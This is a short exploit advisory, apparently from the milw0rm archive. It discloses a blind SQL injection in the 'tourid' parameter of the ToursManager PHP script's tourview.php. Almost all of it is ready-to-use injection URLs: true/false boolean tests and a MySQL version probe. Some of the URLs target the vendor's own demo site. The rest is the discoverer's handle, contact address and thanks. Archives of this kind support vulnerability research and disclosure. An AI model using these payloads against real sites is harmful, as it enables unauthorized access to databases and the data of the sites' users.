[>] Name:--> ToursManager PhP Script <= Blind Sql Injection
[>] Discovered by:--> XaDoS
[>] ContacT m&:--> xados[at]hotmail.it
[>] Site:--> http://www.toursmanager.com
#########
[■] £XpLoIT:
|: http://www.demosite.com/tourview.php?tourid=2%20and%201=1-- (true)
|: http://www.demosite.com/tourview.php?tourid=2%20and%201=0-- (false)
Version:
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=5 (true)
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=4 (false)
V=> 5.x.x XD
#########
[â– ] D&M0:
|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1--
|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=0--
|: http://www.toursmanager.com/demo/tourview.php?tourid=2+and+substring(@@version,1,1)=5
#########
[â– ] Th4Nks T0:
\> Boom3rang </ (very kind) ;-)
\> Langy </
\> Str0ke </
#########
# milw0rm.com [2008-11-20]
